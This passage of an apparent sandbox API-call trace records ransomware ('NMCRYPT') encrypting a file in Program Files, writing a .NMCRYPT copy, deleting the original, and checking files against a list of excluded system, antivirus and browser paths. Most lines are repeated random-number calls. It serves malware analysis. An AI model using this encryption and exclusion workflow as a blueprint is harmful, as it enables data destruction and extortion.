pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.717] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.718] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.719] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.719] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.719] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0158.719] CryptCreateHash (in: hProv=0x8e3aa0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0158.719] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.719] CryptDeriveKey (in: hProv=0x8e3aa0, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad338) returned 1 [0158.719] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0158.719] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0158.719] wcslen (_String="\\\\?\\") returned 0x4 [0158.719] CryptDuplicateKey (in: hKey=0x9ad338, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad4b8) returned 1 [0158.719] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0158.720] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0158.720] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=805) returned 1 [0158.720] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0158.721] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.721] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.722] GetLastError () returned 0x0 [0158.722] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.722] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.722] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.723] GetLastError () returned 0x0 [0158.723] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.723] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0158.723] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0158.723] GetLastError () returned 0x0 [0158.723] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0158.723] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x25, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x25, lpOverlapped=0x0) returned 1 [0158.723] CryptEncrypt (in: hKey=0x9ad4b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x25, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x30) returned 1 [0158.723] GetLastError () returned 0x0 [0158.723] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x30, lpOverlapped=0x0) returned 1 [0158.723] ReadFile (in: hFile=0x1624, lpBuffer=0x607d70, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0158.723] WriteFile (in: hFile=0x588, lpBuffer=0x607d70*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607d70*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0158.723] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml")) returned 0x20 [0158.723] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml", dwFileAttributes=0x20) returned 0 [0158.723] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 1 [0158.723] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml")) returned 0 [0158.724] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" [0158.724] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols") returned 1 [0158.724] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXDF49.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxdf49.tmp")) returned 0xdf49 [0158.724] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXDF49.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxdf49.tmp"), dwFlags=0x1) returned 0 [0158.724] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xXDF49.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\.xxdf49.tmp")) returned 1 [0158.725] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0158.725] wcslen (_String="OK") returned 0x2 [0158.725] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.725] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0158.725] CryptDestroyKey (hKey=0x9ad338) returned 1 [0158.725] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0158.725] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0158.725] FindNextFileW (in: hFindFile=0x9ad138, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*NMCRYPT") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*Recovers your files.html") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.exe") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.dll") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.lnk") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.bat") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.ini") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.msi") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*.scf") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*pagefile.sys*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*AppData*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\winrar\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\java\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\windows\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\ESET\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\AVG\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*Atheros*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*Realtek*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*bootmgr*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*boot*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*boot*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*IO.SYS*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0158.725] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0158.726] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*ntldr*") returned 0 [0158.726] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*chrome*") returned 0 [0158.726] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*opera*") returned 0 [0158.726] PathMatchSpecW (pszFile="symbase.xml", pszSpec="*firefox*") returned 0 [0158.726] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml", pszSpec="*") returned 1 [0158.726] strlen (_Str="NMoreira") returned 0x8 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.726] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, 